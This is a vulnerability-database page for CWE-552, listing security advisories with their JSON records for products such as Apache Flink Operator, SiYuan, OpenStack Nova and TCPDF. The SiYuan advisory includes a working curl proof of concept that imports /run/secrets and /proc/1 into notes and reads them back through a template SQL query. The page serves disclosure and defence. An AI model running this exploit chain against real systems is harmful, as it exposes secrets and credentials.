Common Weakness Enumeration

CWE-552

Allowed

Files or Directories Accessible to External Parties

Abstraction: Base · Status: Draft

The product makes files or directories accessible to unauthorized actors, even though they should not be.

669 vulnerabilities reference this CWE, most recent first.

GHSA-RJ6X-MG28-WF4X

Vulnerability from github – Published: 2026-05-26 18:31 – Updated: 2026-06-01 15:30
VLAI
Details

Files or Directories Accessible to External Parties, Server-Side Request Forgery (SSRF) vulnerability in Apache Flink Kubernetes Operator.

The FlinkSessionJob jarURI is currently not validated so that it points to user-owned files or addresses.  This lets a user with CR create permissions read files from the operator pod's filesystem and pull content from any backing store reachable through Flink's pluggable filesystem layer and access them through the submitted Flink job. Furthermore for fetching from http/https addresses there is currently no allowlist on the URI scheme, no host check, no IP-range restriction, and no protection against pointing the URI at internal or link-local addresses.This issue affects Apache Flink Kubernetes Operator: from 1.3.0 before 1.15.0.

Users are recommended to upgrade to version 1.15.0, which fixes the issue.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-40564"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-552"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-05-26T16:16:24Z",
    "severity": "MODERATE"
  },
  "details": "Files or Directories Accessible to External Parties, Server-Side Request Forgery (SSRF) vulnerability in Apache Flink Kubernetes Operator.\n\nThe FlinkSessionJob jarURI is currently not validated so that it points to user-owned files or addresses.\u00a0\u00a0This lets a user with CR create permissions read files from the operator pod\u0027s filesystem and pull content from any backing store reachable through Flink\u0027s pluggable filesystem layer and access them through the submitted Flink job. Furthermore for fetching from http/https addresses\u00a0there is currently no allowlist on the URI scheme, no host check, no IP-range restriction, and no protection against pointing the URI at internal or link-local addresses.This issue affects Apache Flink Kubernetes Operator: from 1.3.0 before 1.15.0.\n\nUsers are recommended to upgrade to version 1.15.0, which fixes the issue.",
  "id": "GHSA-rj6x-mg28-wf4x",
  "modified": "2026-06-01T15:30:34Z",
  "published": "2026-05-26T18:31:43Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-40564"
    },
    {
      "type": "WEB",
      "url": "https://lists.apache.org/thread/jvxs2kh2o60sl7qkl5nss4r5phzfl4cz"
    },
    {
      "type": "WEB",
      "url": "http://www.openwall.com/lists/oss-security/2026/05/26/6"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-RJCH-HJ8F-VM5C

Vulnerability from github – Published: 2022-05-24 16:58 – Updated: 2024-04-04 02:13
VLAI
Details

An issue was discovered in Zoho ManageEngine DataSecurity Plus before 5.0.1 5012. An exposed service allows a basic user ("Operator" access level) to access the configuration file of the mail server (except for the password).

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2019-17112"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-552"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2019-10-09T20:15:00Z",
    "severity": "MODERATE"
  },
  "details": "An issue was discovered in Zoho ManageEngine DataSecurity Plus before 5.0.1 5012. An exposed service allows a basic user (\"Operator\" access level) to access the configuration file of the mail server (except for the password).",
  "id": "GHSA-rjch-hj8f-vm5c",
  "modified": "2024-04-04T02:13:15Z",
  "published": "2022-05-24T16:58:18Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-17112"
    },
    {
      "type": "WEB",
      "url": "https://excellium-services.com/cert-xlm-advisory/cve-2019-17112"
    },
    {
      "type": "WEB",
      "url": "https://www.manageengine.com/data-security/release-notes.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-RJHH-M223-9QQV

Vulnerability from github – Published: 2026-03-16 18:47 – Updated: 2026-03-30 13:58
VLAI
Summary
SiYuan importStdMd: unvalidated localPath imports arbitrary host directories as persistent notes
Details

Summary

POST /api/import/importStdMd passes the localPath parameter directly to model.ImportFromLocalPath with zero path validation. The function recursively reads every file under the given path and permanently stores their content as SiYuan note documents in the workspace database, making them searchable and accessible to all workspace users.

Details

File: kernel/api/import.go - function importStdMd

func importStdMd(c *gin.Context) {
    notebook  := arg["notebook"].(string)
    localPath := arg["localPath"].(string)
    toPath    := arg["toPath"].(string)

    err := model.ImportFromLocalPath(notebook, localPath, toPath)
}

model.ImportFromLocalPath (kernel/model/import.go:784):

func ImportFromLocalPath(boxID, localPath string, toPath string) (err error) {
    filelock.Walk(localPath, func(currentPath string, d fs.DirEntry, ...) error {
    })
}

Unlike globalCopyFiles, there is no blocklist at all. Any readable path is accepted. The imported content is permanently stored in the workspace SQLite database and survives restarts.

Chained attack with Bug #1 (renderSprig): Admin imports sensitive files --> content stored in blocks table --> non-admin user queries via querySQL through renderSprig.

PoC

docker run -d --name siyuan -p 6806:6806 \
  -v $(pwd)/workspace:/siyuan/workspace \
  b3log/siyuan --workspace=/siyuan/workspace --accessAuthCode=test123

Exploit:

TOKEN="YOUR_ADMIN_TOKEN"

NOTEBOOK=$(curl -s -X POST http://localhost:6806/api/notebook/createNotebook \
  -H "Authorization: Token $TOKEN" -H "Content-Type: application/json" \
  -d '{"name":"Exfil"}' | python3 -c "import sys,json; print(json.load(sys.stdin)['data']['notebook']['id'])")

curl -s -X POST http://localhost:6806/api/import/importStdMd \
  -H "Authorization: Token $TOKEN" \
  -H "Content-Type: application/json" \
  -d "{\"notebook\":\"$NOTEBOOK\",\"localPath\":\"/proc/1\",\"toPath\":\"/\"}"

curl -s -X POST http://localhost:6806/api/import/importStdMd \
  -H "Authorization: Token $TOKEN" \
  -H "Content-Type: application/json" \
  -d "{\"notebook\":\"$NOTEBOOK\",\"localPath\":\"/run/secrets\",\"toPath\":\"/\"}"

curl -s -X POST http://localhost:6806/api/template/renderSprig \
  -H "Authorization: Token $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"template":"{{range $r := (querySQL \"SELECT content FROM blocks LIMIT 50\")}}{{$r.content}}\n---\n{{end}}"}'

Impact

An admin can permanently import the contents of any readable host directory into the workspace as searchable notes. Unlike globalCopyFiles, there is no blocklist - /proc/, /etc/, /run/secrets/, /home/ are all accepted.

Data persists in the workspace database across restarts and is accessible to Publish Service Reader accounts. Combined with the renderSprig SQL injection ( separate advisory ), a non-admin user can then read all imported secrets without any additional privileges.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/siyuan-note/siyuan"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "0.0.0-20260313024916-fd6526133bb3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-32750"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-22",
      "CWE-552"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-16T18:47:22Z",
    "nvd_published_at": "2026-03-19T22:16:41Z",
    "severity": "MODERATE"
  },
  "details": "### Summary\nPOST /api/import/importStdMd passes the localPath parameter directly to model.ImportFromLocalPath with zero path validation. The function recursively reads every file under the given path and permanently stores their content as SiYuan note documents in the workspace database, making them searchable and accessible to all workspace users.\n\n### Details\nFile: kernel/api/import.go - function importStdMd\n\n```go\nfunc importStdMd(c *gin.Context) {\n    notebook  := arg[\"notebook\"].(string)\n    localPath := arg[\"localPath\"].(string)\n    toPath    := arg[\"toPath\"].(string)\n\n    err := model.ImportFromLocalPath(notebook, localPath, toPath)\n}\n```\n\nmodel.ImportFromLocalPath (kernel/model/import.go:784):\n```go\nfunc ImportFromLocalPath(boxID, localPath string, toPath string) (err error) {\n    filelock.Walk(localPath, func(currentPath string, d fs.DirEntry, ...) error {\n    })\n}\n```\n\nUnlike globalCopyFiles, there is no blocklist at all. Any readable path is accepted. The imported content is permanently stored in the workspace SQLite database and survives restarts.\n\nChained attack with Bug #1 (renderSprig):\nAdmin imports sensitive files --\u003e content stored in blocks table --\u003e non-admin user queries via querySQL through renderSprig.\n\n### PoC\n```bash\ndocker run -d --name siyuan -p 6806:6806 \\\n  -v $(pwd)/workspace:/siyuan/workspace \\\n  b3log/siyuan --workspace=/siyuan/workspace --accessAuthCode=test123\n```\n\n**Exploit:**\n```bash\nTOKEN=\"YOUR_ADMIN_TOKEN\"\n\nNOTEBOOK=$(curl -s -X POST http://localhost:6806/api/notebook/createNotebook \\\n  -H \"Authorization: Token $TOKEN\" -H \"Content-Type: application/json\" \\\n  -d \u0027{\"name\":\"Exfil\"}\u0027 | python3 -c \"import sys,json; print(json.load(sys.stdin)[\u0027data\u0027][\u0027notebook\u0027][\u0027id\u0027])\")\n\ncurl -s -X POST http://localhost:6806/api/import/importStdMd \\\n  -H \"Authorization: Token $TOKEN\" \\\n  -H \"Content-Type: application/json\" \\\n  -d \"{\\\"notebook\\\":\\\"$NOTEBOOK\\\",\\\"localPath\\\":\\\"/proc/1\\\",\\\"toPath\\\":\\\"/\\\"}\"\n\ncurl -s -X POST http://localhost:6806/api/import/importStdMd \\\n  -H \"Authorization: Token $TOKEN\" \\\n  -H \"Content-Type: application/json\" \\\n  -d \"{\\\"notebook\\\":\\\"$NOTEBOOK\\\",\\\"localPath\\\":\\\"/run/secrets\\\",\\\"toPath\\\":\\\"/\\\"}\"\n\ncurl -s -X POST http://localhost:6806/api/template/renderSprig \\\n  -H \"Authorization: Token $TOKEN\" \\\n  -H \"Content-Type: application/json\" \\\n  -d \u0027{\"template\":\"{{range $r := (querySQL \\\"SELECT content FROM blocks LIMIT 50\\\")}}{{$r.content}}\\n---\\n{{end}}\"}\u0027\n```\n\n### Impact\nAn admin can permanently import the contents of any readable host directory into the workspace as searchable notes. Unlike globalCopyFiles, there is no blocklist - /proc/, /etc/, /run/secrets/, /home/ are all accepted.\n\nData persists in the workspace database across restarts and is accessible to Publish Service Reader accounts. Combined with the renderSprig SQL injection ( separate advisory ), a non-admin user can then read all imported secrets without any additional privileges.",
  "id": "GHSA-rjhh-m223-9qqv",
  "modified": "2026-03-30T13:58:39Z",
  "published": "2026-03-16T18:47:22Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/siyuan-note/siyuan/security/advisories/GHSA-rjhh-m223-9qqv"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-32750"
    },
    {
      "type": "WEB",
      "url": "https://github.com/siyuan-note/siyuan/commit/13b6d3d45e83525654d120f32a3fdc5d9e95df0b"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/siyuan-note/siyuan"
    },
    {
      "type": "WEB",
      "url": "https://github.com/siyuan-note/siyuan/releases/tag/v3.6.1"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "SiYuan importStdMd: unvalidated localPath imports arbitrary host directories as persistent notes"
}

GHSA-RM86-H44C-2R2M

Vulnerability from github – Published: 2024-07-24 06:31 – Updated: 2025-11-04 19:49
VLAI
Summary
OpenStack Nova vulnerable to unauthorized access to potentially sensitive data
Details

In OpenStack Nova before 27.4.1, 28 before 28.2.1, and 29 before 29.1.1, by supplying a raw format image that is actually a crafted QCOW2 image with a backing file path or VMDK flat image with a descriptor file path, an authenticated user may convince systems to return a copy of the referenced file's contents from the server, resulting in unauthorized access to potentially sensitive data. All Nova deployments are affected. NOTE: this issue exists because of an incomplete fix for CVE-2022-47951 and CVE-2024-32498.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "Nova"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "27.4.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "Nova"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "28.0.0"
            },
            {
              "last_affected": "28.2.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "Nova"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "29.0.0"
            },
            {
              "last_affected": "29.1.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2024-40767"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-436",
      "CWE-552"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2024-07-25T14:27:53Z",
    "nvd_published_at": "2024-07-24T05:15:12Z",
    "severity": "MODERATE"
  },
  "details": "In OpenStack Nova before 27.4.1, 28 before 28.2.1, and 29 before 29.1.1, by supplying a raw format image that is actually a crafted QCOW2 image with a backing file path or VMDK flat image with a descriptor file path, an authenticated user may convince systems to return a copy of the referenced file\u0027s contents from the server, resulting in unauthorized access to potentially sensitive data. All Nova deployments are affected. NOTE: this issue exists because of an incomplete fix for CVE-2022-47951 and CVE-2024-32498.",
  "id": "GHSA-rm86-h44c-2r2m",
  "modified": "2025-11-04T19:49:52Z",
  "published": "2024-07-24T06:31:10Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-40767"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/openstack/nova"
    },
    {
      "type": "WEB",
      "url": "https://launchpad.net/bugs/2071734"
    },
    {
      "type": "WEB",
      "url": "https://lists.debian.org/debian-lts-announce/2024/09/msg00017.html"
    },
    {
      "type": "WEB",
      "url": "https://review.opendev.org/c/openstack/nova/+/924731"
    },
    {
      "type": "WEB",
      "url": "https://security.openstack.org"
    },
    {
      "type": "WEB",
      "url": "https://security.openstack.org/ossa/OSSA-2024-002.html"
    },
    {
      "type": "WEB",
      "url": "https://www.openwall.com/lists/oss-security/2024/07/23/2"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "OpenStack Nova vulnerable to unauthorized access to potentially sensitive data "
}

GHSA-RMV2-8JJC-23XW

Vulnerability from github – Published: 2024-11-26 18:38 – Updated: 2025-11-03 22:50
VLAI
Summary
TCPDF Local File Inclusion vulnerability
Details

Local File Inclusion (LFI) vulnerability has been discovered in TCPDF 6.7.5. This vulnerability enables a user to read arbitrary files from the server's file system through src tag, potentially exposing sensitive information.

Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 6.7.5"
      },
      "package": {
        "ecosystem": "Packagist",
        "name": "tecnickcom/tcpdf"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "6.7.6"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2024-51058"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-552"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2024-11-26T21:54:04Z",
    "nvd_published_at": "2024-11-26T18:15:19Z",
    "severity": "MODERATE"
  },
  "details": "Local File Inclusion (LFI) vulnerability has been discovered in TCPDF 6.7.5. This vulnerability enables a user to read arbitrary files from the server\u0027s file system through \u003cimg\u003e src tag, potentially exposing sensitive information.",
  "id": "GHSA-rmv2-8jjc-23xw",
  "modified": "2025-11-03T22:50:36Z",
  "published": "2024-11-26T18:38:52Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-51058"
    },
    {
      "type": "WEB",
      "url": "https://github.com/tecnickcom/TCPDF/commit/bfa7d2b6d455ebf72ebe3d48fbd487ee5a1f6f3b"
    },
    {
      "type": "WEB",
      "url": "https://github.com/saravana-hackz/vulnerability-research/tree/main/CVE-2024-51058"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/tecnickcom/TCPDF"
    },
    {
      "type": "WEB",
      "url": "https://lists.debian.org/debian-lts-announce/2025/06/msg00004.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P",
      "type": "CVSS_V4"
    }
  ],
  "summary": "TCPDF Local File Inclusion vulnerability"
}

GHSA-RPWQ-XW4M-459X

Vulnerability from github – Published: 2023-01-17 03:30 – Updated: 2023-01-25 15:30
VLAI
Details

A vulnerability exists in the FTP server of the Zyxel AX7501-B0 firmware prior to V5.17(ABPC.3)C0, which processes symbolic links on external storage media. A local authenticated attacker with administrator privileges could abuse this vulnerability to access the root file system by creating a symbolic link on external storage media, such as a USB flash drive, and then logging into the FTP server on a vulnerable device.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2022-45440"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-552",
      "CWE-59"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2023-01-17T02:15:00Z",
    "severity": "MODERATE"
  },
  "details": "A vulnerability exists in the FTP server of the Zyxel AX7501-B0 firmware prior to V5.17(ABPC.3)C0, which processes symbolic links on external storage media. A local authenticated attacker with administrator privileges could abuse this vulnerability to access the root file system by creating a symbolic link on external storage media, such as a USB flash drive, and then logging into the FTP server on a vulnerable device.",
  "id": "GHSA-rpwq-xw4m-459x",
  "modified": "2023-01-25T15:30:59Z",
  "published": "2023-01-17T03:30:25Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-45440"
    },
    {
      "type": "WEB",
      "url": "https://www.zyxel.com/global/en/support/security-advisories/zyxel-security-advisory-for-cleartext-storage-of-wifi-credentials-and-improper-symbolic-links-of-ftp-for-ax7501-b0-cpe"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-RQ5P-J687-H2VF

Vulnerability from github – Published: 2024-08-22 15:31 – Updated: 2024-08-23 15:30
VLAI
Details

cgi-bin/fdmcgiwebv2.cgi on Swissphone DiCal-RED 4009 devices allows an authenticated attacker to gain access to arbitrary files on the device's file system.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-36442"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-552"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-08-22T15:15:16Z",
    "severity": "HIGH"
  },
  "details": "cgi-bin/fdmcgiwebv2.cgi on Swissphone DiCal-RED 4009 devices allows an authenticated attacker to gain access to arbitrary files on the device\u0027s file system.",
  "id": "GHSA-rq5p-j687-h2vf",
  "modified": "2024-08-23T15:30:33Z",
  "published": "2024-08-22T15:31:19Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-36442"
    },
    {
      "type": "WEB",
      "url": "https://www.swissphone.com/en-us/solutions/components/terminals/radio-data-module-dical-red"
    },
    {
      "type": "WEB",
      "url": "https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-039.txt"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-RR45-4XHX-RXC8

Vulnerability from github – Published: 2022-05-24 17:43 – Updated: 2022-05-24 17:43
VLAI
Details

A flaw was found in ansible-tower. The default installation is vulnerable to Job Isolation escape allowing an attacker to elevate the privilege from a low privileged user to the awx user from outside the isolated environment. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2021-20253"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-552"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2021-03-09T18:15:00Z",
    "severity": "HIGH"
  },
  "details": "A flaw was found in ansible-tower. The default installation is vulnerable to Job Isolation escape allowing an attacker to elevate the privilege from a low privileged user to the awx user from outside the isolated environment. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.",
  "id": "GHSA-rr45-4xhx-rxc8",
  "modified": "2022-05-24T17:43:52Z",
  "published": "2022-05-24T17:43:52Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-20253"
    },
    {
      "type": "WEB",
      "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1928847"
    }
  ],
  "schema_version": "1.4.0",
  "severity": []
}

GHSA-RVCJ-88M8-GCJ3

Vulnerability from github – Published: 2022-05-13 01:42 – Updated: 2022-05-13 01:42
VLAI
Details

Microsoft Windows 10 allows an elevation of privilege vulnerability when the Windows Update Delivery Optimization does not properly enforce file share permissions.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2017-11829"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-552"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2017-10-13T13:29:00Z",
    "severity": "MODERATE"
  },
  "details": "Microsoft Windows 10 allows an elevation of privilege vulnerability when the Windows Update Delivery Optimization does not properly enforce file share permissions.",
  "id": "GHSA-rvcj-88m8-gcj3",
  "modified": "2022-05-13T01:42:34Z",
  "published": "2022-05-13T01:42:34Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-11829"
    },
    {
      "type": "WEB",
      "url": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11829"
    },
    {
      "type": "WEB",
      "url": "http://www.securityfocus.com/bid/101213"
    },
    {
      "type": "WEB",
      "url": "http://www.securitytracker.com/id/1039526"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-RX6G-PR26-7GXJ

Vulnerability from github – Published: 2024-06-10 21:30 – Updated: 2026-04-02 21:31
VLAI
Details

The issue was addressed with improved checks. This issue is fixed in macOS Sonoma 14.5, watchOS 10.5, iOS 17.5 and iPadOS 17.5, iOS 16.7.8 and iPadOS 16.7.8. A maliciously crafted email may be able to initiate FaceTime calls without user authorization.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-23282"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-552"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-06-10T21:15:49Z",
    "severity": "MODERATE"
  },
  "details": "The issue was addressed with improved checks. This issue is fixed in macOS Sonoma 14.5, watchOS 10.5, iOS 17.5 and iPadOS 17.5, iOS 16.7.8 and iPadOS 16.7.8. A maliciously crafted email may be able to initiate FaceTime calls without user authorization.",
  "id": "GHSA-rx6g-pr26-7gxj",
  "modified": "2026-04-02T21:31:44Z",
  "published": "2024-06-10T21:30:38Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-23282"
    },
    {
      "type": "WEB",
      "url": "https://support.apple.com/en-us/120898"
    },
    {
      "type": "WEB",
      "url": "https://support.apple.com/en-us/120902"
    },
    {
      "type": "WEB",
      "url": "https://support.apple.com/en-us/120903"
    },
    {
      "type": "WEB",
      "url": "https://support.apple.com/en-us/120905"
    },
    {
      "type": "WEB",
      "url": "https://support.apple.com/en-us/HT214100"
    },
    {
      "type": "WEB",
      "url": "https://support.apple.com/en-us/HT214101"
    },
    {
      "type": "WEB",
      "url": "https://support.apple.com/en-us/HT214104"
    },
    {
      "type": "WEB",
      "url": "https://support.apple.com/en-us/HT214106"
    },
    {
      "type": "WEB",
      "url": "https://support.apple.com/kb/HT214100"
    },
    {
      "type": "WEB",
      "url": "https://support.apple.com/kb/HT214101"
    },
    {
      "type": "WEB",
      "url": "https://support.apple.com/kb/HT214104"
    },
    {
      "type": "WEB",
      "url": "https://support.apple.com/kb/HT214106"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
      "type": "CVSS_V3"
    }
  ]
}

Mitigation
Implementation System Configuration Operation

When storing data in the cloud (e.g., S3 buckets, Azure blobs, Google Cloud Storage, etc.), use the provider's controls to disable public access.

CAPEC-150: Collect Data from Common Resource Locations

An adversary exploits well-known locations for resources for the purposes of undermining the security of the target. In many, if not most systems, files and resources are organized in a default tree structure. This can be useful for adversaries because they often know where to look for resources or files that are necessary for attacks. Even when the precise location of a targeted resource may not be known, naming conventions may indicate a small area of the target machine's file tree where the resources are typically located. For example, configuration files are normally stored in the /etc director on Unix systems. Adversaries can take advantage of this to commit other types of attacks.

CAPEC-639: Probe System Files

An adversary obtains unauthorized information due to improperly protected files. If an application stores sensitive information in a file that is not protected by proper access control, then an adversary can access the file and search for sensitive information.